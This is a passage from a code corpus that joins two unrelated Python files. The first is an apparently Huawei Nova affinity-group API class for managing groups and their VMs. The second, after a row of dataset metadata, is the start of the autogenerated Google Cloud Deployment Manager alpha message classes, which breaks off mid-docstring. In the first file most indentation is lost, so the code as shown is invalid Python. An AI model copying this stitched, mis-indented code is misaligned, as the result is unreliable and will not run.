    """Sub-set of the Compute Manager API for managing affinity groups."""
def __init__(self, **kwargs):
self.compute_rpcapi = affinity_rpcapi.HuaweiComputeAPI()
self.compute_api = core_api.API()
super(AffinityGroupAPI, self).__init__(**kwargs)
def create_affinity_group(self, context, affinity_name, description, type,
metadata):
"""Creates the model for the affinity group."""
affinitygroup = affinitygroup_obj.AffinityGroup()
affinitygroup.name = affinity_name
affinitygroup.description = description
affinitygroup.type = type
affinitygroup.metadata = metadata
affinitygroup.create(context)
affinitygroup = self._reformat_affinitygroup_info(affinitygroup)
return affinitygroup
    def get_affinity_group_list(self, context):
        """Get all affinity groups."""
affinitygroups = affinitygroup_obj.AffinityGroupList.get_all(context)
vm_id = None
affinity_group = None
for affinitygroup in affinitygroups:
affinity_group = affinitygroup
for vm_id_temp in affinitygroup.vms:
try:
vm_id = vm_id_temp
self.compute_api.get(context, vm_id_temp, want_objects=True)
except exception.InstanceNotFound:
affinity_group.delete_vm(context, str(vm_id))
return [self._reformat_affinitygroup_info(element) for element in
affinitygroups]
    def _reformat_affinitygroup_info(self, affinitygroup):
        """Builds a dictionary from the affinity group's properties."""
return dict(affinitygroup.iteritems())
## delete affinitygroup by id
def delete_affinity_group(self, context, affinitygroup_id):
"""Delete affinity group by affinitygroup_id"""
affinitygroup = affinitygroup_obj.AffinityGroup()
affinitygroup.id = affinitygroup_id
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinitygroup_id)
action_name = "delete"
if (affinitygroup.vms is not None) and (affinitygroup.vms != []):
            msg = ("Can't delete affinity group with instances in it: %s"
                   % affinitygroup.vms)
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinitygroup_id,
reason=msg)
affinitygroup.destroy(context)
def update_affinitygroup(self, context, affinitygroup_id, values):
"""Update the properties of given affinity group."""
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinitygroup_id)
if 'name' in values:
affinitygroup.name = values.pop('name')
if 'description' in values:
affinitygroup.description = values.pop('description')
if "metadata" in values:
affinitygroup.metadata = values.pop('metadata')
affinitygroup.save()
return self._reformat_affinitygroup_info(affinitygroup)
    def get_affinitygroup(self, context, affinitygroup_id):
        """Get the details of an affinity group by the given id."""
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinitygroup_id)
vm_id = None
for vm_id_temp in affinitygroup.vms:
try:
vm_id = vm_id_temp
self.compute_api.get(context, vm_id_temp, want_objects=True)
except exception.InstanceNotFound:
affinitygroup.delete_vm(context, str(vm_id))
showinfo = self._reformat_affinitygroup_info(affinitygroup)
        # get the detailed information about the vms
instance_ids = affinitygroup.vms
if instance_ids:
vmsinfo = {}
for instance_id in instance_ids:
instance = self.compute_api.get(context, instance_id)
vmsinfo[instance_id] = instance
showinfo['vmsinfo'] = vmsinfo
return showinfo
def _check_vms_in_affinity_group(self, context, vm_list,
affinity_group_id):
for vm in vm_list:
try:
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_vm_id(
context, str(vm['id']))
except huawei_exception.AffinityGroupNotFound:
continue
if affinitygroup:
                LOG.debug(_("instance %s has already been added to affinity "
                            "group %s") % (vm['uuid'], affinitygroup.name))
                action_name = "add vms to affinitygroup"
                msg = "instance has already been added to an affinity group"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=str(affinity_group_id),
reason=msg)
def add_vms_to_affinity_group(self, context, affinity_group_id, vm_list):
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinity_group_id)
availability_zone = affinitygroup.availability_zone
self._check_vms_in_affinity_group(context, vm_list, affinity_group_id)
if availability_zone:
for vm in vm_list:
                # vm['node'] is formatted as "host(cluster)"; extract the
                # cluster name and compare it with the group's availability zone
                cluster_temp = vm['node'].split('(')
                cluster_temp = cluster_temp[1].split(')')
                cluster = cluster_temp[0]
                if availability_zone != cluster:
                    LOG.debug(_("affinity availability_zone %s "
                                "is not the same as %s") % (availability_zone, cluster))
                    action_name = "add vms to affinitygroup"
                    msg = "affinity availability_zone is not the same as the vm's"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.add_vms_to_affinity_group(context,
affinity_group_id,
vm_list)
else:
vm_zone = vm_list[0]['node']
for vm in vm_list:
if vm_zone != vm['node']:
                    LOG.debug(_("vms are not all in the same availability_zone"))
                    action_name = "add vms to affinitygroup"
                    msg = "vms are not all in the same availability_zone"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.add_vms_to_affinity_group(context,
affinity_group_id,
vm_list)
def remove_vms_from_affinity_group(self, context, affinity_group_id,
vm_list):
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinity_group_id)
availability_zone = affinitygroup.availability_zone
if availability_zone:
for vm in vm_list:
                # vm['node'] is formatted as "host(cluster)"; extract the
                # cluster name and compare it with the group's availability zone
                cluster_temp = vm['node'].split('(')
                cluster_temp = cluster_temp[1].split(')')
                cluster = cluster_temp[0]
                if availability_zone != cluster:
                    LOG.debug(_("affinity availability_zone %s "
                                "is not the same as %s") % (availability_zone, cluster))
                    action_name = "remove vms from affinitygroup"
                    msg = "affinity availability_zone is not the same as the vm's"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.remove_vms_from_affinity_group(context,
affinity_group_id, vm_list)
else:
vm_zone = vm_list[0]['node']
for vm in vm_list:
if vm_zone != vm['node']:
                    LOG.debug(_("vms are not all in the same availability_zone"))
                    action_name = "remove vms from affinitygroup"
                    msg = "vms are not all in the same availability_zone"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.remove_vms_from_affinity_group(context,
affinity_group_id,
vm_list)
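# Illustrative sketch only (not part of the original module): how a caller,
# e.g. an API extension, might drive AffinityGroupAPI.  `context` is assumed
# to be a nova RequestContext, and the group id comes from the dict returned
# by create_affinity_group().
def _example_usage(context):
    api = AffinityGroupAPI()
    group = api.create_affinity_group(context,
                                      affinity_name='group-1',
                                      description='example group',
                                      type='affinity',
                                      metadata={})
    return api.get_affinitygroup(context, group['id'])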
| apache-2.0 | 6,548,163,418,314,135,000 | 48.273148 | 85 | 0.569764 | false |
Sorsly/subtle | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/deploymentmanager/alpha/deploymentmanager_alpha_messages.py | 1 | 83769 | """Generated message classes for deploymentmanager version alpha.
The Deployment Manager API allows users to declaratively configure, deploy and
run complex solutions on the Google Cloud Platform.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
package = 'deploymentmanager'
class AuditConfig(_messages.Message):
"""Specifies the audit configuration for a service. It consists of which
permission types are logged, and what identities, if any, are exempted from
  logging. An AuditConfig must have one or more AuditLogConfigs.
Fields:
auditLogConfigs: The configuration for logging of each type of permission.
exemptedMembers: Specifies the identities that are exempted from "data
access" audit logging for the `service` specified above. Follows the
same format of Binding.members. This field is deprecated in favor of
per-permission-type exemptions.
service: Specifies a service that will be enabled for audit logging. For
example, `resourcemanager`, `storage`, `compute`. `allServices` is a
special value that covers all services.
"""
auditLogConfigs = _messages.MessageField('AuditLogConfig', 1, repeated=True)
exemptedMembers = _messages.StringField(2, repeated=True)
service = _messages.StringField(3)
class AuditLogConfig(_messages.Message):
"""Provides the configuration for logging a type of permissions. Example: {
"audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [
"user:[email protected]" ] }, { "log_type": "DATA_WRITE", } ] } This enables
'DATA_READ' and 'DATA_WRITE' logging, while exempting [email protected] from
DATA_READ logging.
Fields:
exemptedMembers: Specifies the identities that do not cause logging for
this type of permission. Follows the same format of [Binding.members][].
logType: The log type that this config enables.
"""
exemptedMembers = _messages.StringField(1, repeated=True)
logType = _messages.StringField(2)
class BasicAuth(_messages.Message):
"""Basic Auth used as a credential.
Fields:
password: A string attribute.
user: A string attribute.
"""
password = _messages.StringField(1)
user = _messages.StringField(2)
class Binding(_messages.Message):
"""Associates `members` with a `role`.
Fields:
members: Specifies the identities requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet; with
or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example, `[email protected]` or
`[email protected]`. * `serviceAccount:{emailid}`: An email address
that represents a service account. For example, `my-other-
[email protected]`. * `group:{emailid}`: An email address
that represents a Google group. For example, `[email protected]`. *
`domain:{domain}`: A Google Apps domain name that represents all the
users of that domain. For example, `google.com` or `example.com`.
role: Role that is assigned to `members`. For example, `roles/viewer`,
`roles/editor`, or `roles/owner`.
"""
members = _messages.StringField(1, repeated=True)
role = _messages.StringField(2)
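# Illustrative sketch (not generated code): a Binding granting the viewer
# role to a user and a service account, using the member formats listed in
# the docstring above.
def _example_binding():
  return Binding(
      role='roles/viewer',
      members=['user:[email protected]',
               'serviceAccount:[email protected]'])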
class CollectionOverride(_messages.Message):
"""CollectionOverride allows resource handling overrides for specific
resources within a BaseType
Fields:
collection: The collection that identifies this resource within its
service.
options: The options to apply to this resource-level override
"""
collection = _messages.StringField(1)
options = _messages.MessageField('Options', 2)
class CompositeType(_messages.Message):
"""Holds the composite type.
Fields:
description: An optional textual description of the resource; provided by
the client when the resource is created.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the composite type was created,
in RFC3339 text format.
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
name: Name of the composite type.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this composite type.
selfLink: [Output Only] Self link for the type provider.
status: A string attribute.
templateContents: Files for the template type.
"""
description = _messages.StringField(1)
id = _messages.IntegerField(2, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(3)
labels = _messages.MessageField('CompositeTypeLabelEntry', 4, repeated=True)
name = _messages.StringField(5)
operation = _messages.MessageField('Operation', 6)
selfLink = _messages.StringField(7)
status = _messages.StringField(8)
templateContents = _messages.MessageField('TemplateContents', 9)
class CompositeTypeLabelEntry(_messages.Message):
"""A CompositeTypeLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class CompositeTypesListResponse(_messages.Message):
"""A response that returns all Composite Types supported by Deployment
Manager
Fields:
compositeTypes: [Output Only] A list of resource composite types supported
by Deployment Manager.
nextPageToken: A token used to continue a truncated list request.
"""
compositeTypes = _messages.MessageField('CompositeType', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class Condition(_messages.Message):
"""A condition to be met.
Fields:
iam: Trusted attributes supplied by the IAM system.
op: An operator to apply the subject with.
svc: Trusted attributes discharged by the service.
sys: Trusted attributes supplied by any service that owns resources and
uses the IAM system for access control.
value: DEPRECATED. Use 'values' instead.
values: The objects of the condition. This is mutually exclusive with
'value'.
"""
iam = _messages.StringField(1)
op = _messages.StringField(2)
svc = _messages.StringField(3)
sys = _messages.StringField(4)
value = _messages.StringField(5)
values = _messages.StringField(6, repeated=True)
class ConfigFile(_messages.Message):
"""ConfigFile message type.
Fields:
content: The contents of the file.
"""
content = _messages.StringField(1)
class ConfigurableService(_messages.Message):
"""BaseType that describes a service-backed Type.
Fields:
collectionOverrides: Allows resource handling overrides for specific
collections
credential: Credential used when interacting with this type.
    descriptorUrl: Descriptor URL for this type.
options: Options to apply when handling any resources in this service.
"""
collectionOverrides = _messages.MessageField('CollectionOverride', 1, repeated=True)
credential = _messages.MessageField('Credential', 2)
descriptorUrl = _messages.StringField(3)
options = _messages.MessageField('Options', 4)
class Credential(_messages.Message):
"""Credential used by ConfigurableResourceTypes.
Fields:
basicAuth: Basic Auth Credentials for this Type.
"""
basicAuth = _messages.MessageField('BasicAuth', 1)
class Deployment(_messages.Message):
"""Deployment message type.
Fields:
description: An optional user-provided description of the deployment.
fingerprint: Provides a fingerprint to use in requests to modify a
deployment, such as update(), stop(), and cancelPreview() requests. A
fingerprint is a randomly generated value that must be provided with
update(), stop(), and cancelPreview() requests to perform optimistic
locking. This ensures optimistic concurrency so that only one request
happens at a time. The fingerprint is initially generated by Deployment
Manager and changes after every request to modify data. To get the
latest fingerprint value, perform a get() request to a deployment.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the deployment was created, in
RFC3339 text format .
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
manifest: [Output Only] URL of the manifest representing the last manifest
that was successfully deployed.
name: Name of the resource; provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with RFC1035.
Specifically, the name must be 1-63 characters long and match the
regular expression [a-z]([-a-z0-9]*[a-z0-9])? which means the first
character must be a lowercase letter, and all following characters must
be a dash, lowercase letter, or digit, except the last character, which
cannot be a dash.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this deployment.
selfLink: [Output Only] Self link for the deployment.
target: [Input Only] The parameters that define your deployment, including
the deployment configuration and relevant templates.
update: [Output Only] If Deployment Manager is currently updating or
previewing an update to this deployment, the updated configuration
appears here.
"""
description = _messages.StringField(1)
fingerprint = _messages.BytesField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(4)
labels = _messages.MessageField('DeploymentLabelEntry', 5, repeated=True)
manifest = _messages.StringField(6)
name = _messages.StringField(7)
operation = _messages.MessageField('Operation', 8)
selfLink = _messages.StringField(9)
target = _messages.MessageField('TargetConfiguration', 10)
update = _messages.MessageField('DeploymentUpdate', 11)
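# Illustrative sketch (not generated code): the optimistic-locking pattern the
# `fingerprint` field above describes.  `client` is a hypothetical apitools
# client wrapper exposing the deployments service; only the message classes
# come from this module.
def _example_fingerprint_update(client, project, name):
  current = client.deployments.Get(
      DeploymentmanagerDeploymentsGetRequest(project=project, deployment=name))
  updated = Deployment(
      name=name,
      description='updated description',
      # Echo back the fingerprint from the latest get(); Deployment Manager
      # rejects the update if another request modified the deployment since.
      fingerprint=current.fingerprint)
  return client.deployments.Update(
      DeploymentmanagerDeploymentsUpdateRequest(
          project=project, deployment=name, deploymentResource=updated))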
class DeploymentLabelEntry(_messages.Message):
"""A DeploymentLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class DeploymentUpdate(_messages.Message):
"""DeploymentUpdate message type.
Fields:
description: [Output Only] An optional user-provided description of the
deployment after the current update has been applied.
labels: [Output Only] Map of labels; provided by the client when the
resource is created or updated. Specifically: Label keys must be between
1 and 63 characters long and must conform to the following regular
expression: [a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0
and 63 characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
manifest: [Output Only] URL of the manifest representing the update
configuration of this deployment.
"""
description = _messages.StringField(1)
labels = _messages.MessageField('DeploymentUpdateLabelEntry', 2, repeated=True)
manifest = _messages.StringField(3)
class DeploymentUpdateLabelEntry(_messages.Message):
"""A DeploymentUpdateLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class DeploymentmanagerCompositeTypesDeleteRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesDeleteRequest object.
Fields:
compositeType: The name of the type for this request.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerCompositeTypesGetRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesGetRequest object.
Fields:
compositeType: The name of the composite type for this request.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerCompositeTypesInsertRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesInsertRequest object.
Fields:
compositeType: A CompositeType resource to be passed as the request body.
project: The project ID for this request.
"""
compositeType = _messages.MessageField('CompositeType', 1)
project = _messages.StringField(2, required=True)
class DeploymentmanagerCompositeTypesListRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
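# Illustrative sketch (not generated code): a list request using the filter
# syntax described above.  The project ID is a placeholder; the filter keeps
# only composite types whose name is not 'example-type'.
def _example_composite_types_list_request():
  return DeploymentmanagerCompositeTypesListRequest(
      project='my-project',
      filter='name ne example-type',
      maxResults=100)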
class DeploymentmanagerCompositeTypesPatchRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesPatchRequest object.
Fields:
compositeType: The name of the composite type for this request.
compositeTypeResource: A CompositeType resource to be passed as the
request body.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
compositeTypeResource = _messages.MessageField('CompositeType', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerCompositeTypesUpdateRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesUpdateRequest object.
Fields:
compositeType: The name of the composite type for this request.
compositeTypeResource: A CompositeType resource to be passed as the
request body.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
compositeTypeResource = _messages.MessageField('CompositeType', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsCancelPreviewRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsCancelPreviewRequest object.
Fields:
deployment: The name of the deployment for this request.
deploymentsCancelPreviewRequest: A DeploymentsCancelPreviewRequest
resource to be passed as the request body.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
deploymentsCancelPreviewRequest = _messages.MessageField('DeploymentsCancelPreviewRequest', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsDeleteRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsDeleteRequest object.
Enums:
DeletePolicyValueValuesEnum: Sets the policy to use for deleting
resources.
Fields:
deletePolicy: Sets the policy to use for deleting resources.
deployment: The name of the deployment for this request.
project: The project ID for this request.
"""
class DeletePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for deleting resources.
Values:
ABANDON: <no description>
DELETE: <no description>
"""
ABANDON = 0
DELETE = 1
deletePolicy = _messages.EnumField('DeletePolicyValueValuesEnum', 1, default=u'DELETE')
deployment = _messages.StringField(2, required=True)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsGetIamPolicyRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsGetIamPolicyRequest object.
Fields:
project: Project ID for this request.
resource: Name of the resource for this request.
"""
project = _messages.StringField(1, required=True)
resource = _messages.StringField(2, required=True)
class DeploymentmanagerDeploymentsGetRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsGetRequest object.
Fields:
deployment: The name of the deployment for this request.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerDeploymentsInsertRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsInsertRequest object.
Fields:
deployment: A Deployment resource to be passed as the request body.
preview: If set to true, creates a deployment and creates "shell"
resources but does not actually instantiate these resources. This allows
you to preview what your deployment looks like. After previewing a
deployment, you can deploy your resources by making a request with the
update() method or you can use the cancelPreview() method to cancel the
preview altogether. Note that the deployment will still exist after you
cancel the preview and you must separately delete this deployment if you
want to remove it.
project: The project ID for this request.
"""
deployment = _messages.MessageField('Deployment', 1)
preview = _messages.BooleanField(2)
project = _messages.StringField(3, required=True)
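# Illustrative sketch (not generated code): creating a deployment in preview
# mode as described above.  `client` is a hypothetical apitools client
# wrapper and `deployment` a Deployment message; the previewed resources are
# only instantiated by a later update(), or discarded by cancelPreview().
def _example_preview_insert(client, project, deployment):
  request = DeploymentmanagerDeploymentsInsertRequest(
      project=project, deployment=deployment, preview=True)
  return client.deployments.Insert(request)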
class DeploymentmanagerDeploymentsListRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerDeploymentsPatchRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsPatchRequest object.
Enums:
CreatePolicyValueValuesEnum: Sets the policy to use for creating new
resources.
DeletePolicyValueValuesEnum: Sets the policy to use for deleting
resources.
Fields:
createPolicy: Sets the policy to use for creating new resources.
deletePolicy: Sets the policy to use for deleting resources.
deployment: The name of the deployment for this request.
deploymentResource: A Deployment resource to be passed as the request
body.
preview: If set to true, updates the deployment and creates and updates
the "shell" resources but does not actually alter or instantiate these
resources. This allows you to preview what your deployment will look
like. You can use this intent to preview how an update would affect your
deployment. You must provide a target.config with a configuration if
this is set to true. After previewing a deployment, you can deploy your
resources by making a request with the update() or you can
cancelPreview() to remove the preview altogether. Note that the
deployment will still exist after you cancel the preview and you must
separately delete this deployment if you want to remove it.
project: The project ID for this request.
"""
class CreatePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for creating new resources.
Values:
ACQUIRE: <no description>
CREATE_OR_ACQUIRE: <no description>
"""
ACQUIRE = 0
CREATE_OR_ACQUIRE = 1
class DeletePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for deleting resources.
Values:
ABANDON: <no description>
DELETE: <no description>
"""
ABANDON = 0
DELETE = 1
createPolicy = _messages.EnumField('CreatePolicyValueValuesEnum', 1, default=u'CREATE_OR_ACQUIRE')
deletePolicy = _messages.EnumField('DeletePolicyValueValuesEnum', 2, default=u'DELETE')
deployment = _messages.StringField(3, required=True)
deploymentResource = _messages.MessageField('Deployment', 4)
preview = _messages.BooleanField(5, default=False)
project = _messages.StringField(6, required=True)
class DeploymentmanagerDeploymentsSetIamPolicyRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsSetIamPolicyRequest object.
Fields:
policy: A Policy resource to be passed as the request body.
project: Project ID for this request.
resource: Name of the resource for this request.
"""
policy = _messages.MessageField('Policy', 1)
project = _messages.StringField(2, required=True)
resource = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsStopRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsStopRequest object.
Fields:
deployment: The name of the deployment for this request.
deploymentsStopRequest: A DeploymentsStopRequest resource to be passed as
the request body.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
deploymentsStopRequest = _messages.MessageField('DeploymentsStopRequest', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsTestIamPermissionsRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsTestIamPermissionsRequest object.
Fields:
project: Project ID for this request.
resource: Name of the resource for this request.
testPermissionsRequest: A TestPermissionsRequest resource to be passed as
the request body.
"""
project = _messages.StringField(1, required=True)
resource = _messages.StringField(2, required=True)
testPermissionsRequest = _messages.MessageField('TestPermissionsRequest', 3)
class DeploymentmanagerDeploymentsUpdateRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsUpdateRequest object.
Enums:
CreatePolicyValueValuesEnum: Sets the policy to use for creating new
resources.
DeletePolicyValueValuesEnum: Sets the policy to use for deleting
resources.
Fields:
createPolicy: Sets the policy to use for creating new resources.
deletePolicy: Sets the policy to use for deleting resources.
deployment: The name of the deployment for this request.
deploymentResource: A Deployment resource to be passed as the request
body.
preview: If set to true, updates the deployment and creates and updates
the "shell" resources but does not actually alter or instantiate these
resources. This allows you to preview what your deployment will look
like. You can use this intent to preview how an update would affect your
deployment. You must provide a target.config with a configuration if
this is set to true. After previewing a deployment, you can deploy your
resources by making a request with the update() or you can
cancelPreview() to remove the preview altogether. Note that the
deployment will still exist after you cancel the preview and you must
separately delete this deployment if you want to remove it.
project: The project ID for this request.
"""
class CreatePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for creating new resources.
Values:
ACQUIRE: <no description>
CREATE_OR_ACQUIRE: <no description>
"""
ACQUIRE = 0
CREATE_OR_ACQUIRE = 1
class DeletePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for deleting resources.
Values:
ABANDON: <no description>
DELETE: <no description>
"""
ABANDON = 0
DELETE = 1
createPolicy = _messages.EnumField('CreatePolicyValueValuesEnum', 1, default=u'CREATE_OR_ACQUIRE')
deletePolicy = _messages.EnumField('DeletePolicyValueValuesEnum', 2, default=u'DELETE')
deployment = _messages.StringField(3, required=True)
deploymentResource = _messages.MessageField('Deployment', 4)
preview = _messages.BooleanField(5, default=False)
project = _messages.StringField(6, required=True)
class DeploymentmanagerManifestsGetRequest(_messages.Message):
"""A DeploymentmanagerManifestsGetRequest object.
Fields:
deployment: The name of the deployment for this request.
manifest: The name of the manifest for this request.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
manifest = _messages.StringField(2, required=True)
project = _messages.StringField(3, required=True)
class DeploymentmanagerManifestsListRequest(_messages.Message):
"""A DeploymentmanagerManifestsListRequest object.
Fields:
deployment: The name of the deployment for this request.
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
